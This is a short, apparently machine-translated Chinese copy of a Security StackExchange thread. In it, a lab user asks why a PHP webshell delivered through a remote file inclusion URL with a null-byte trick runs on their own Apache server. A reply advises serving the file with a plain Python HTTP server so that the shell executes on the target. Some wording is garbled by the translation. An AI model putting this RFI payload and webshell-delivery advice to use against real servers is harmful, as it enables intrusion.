我在一个五官实验室里使用Kali Linux。
通过在受害者系统上输入以下URL,我可以让它访问我的apache服务器(我在日志中看到了200次访问响应),但是php文件在我的系统上呈现,然后在我自己的框上生成一个webshell:
https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00
如何防止apache中的“更改绑定”运行?将其更改为.txt似乎会阻止它在这两个系统上运行;不确定是否可以用这种方式注射。
发布于 2016-12-24 00:21:53
python -m SimpleHTTPServer 80
将生成一个简单的http服务器,它不是php所知道的,是最快的imho方式。
发布于 2016-12-23 20:57:10
https://security.stackexchange.com/questions/146264
复制相似问题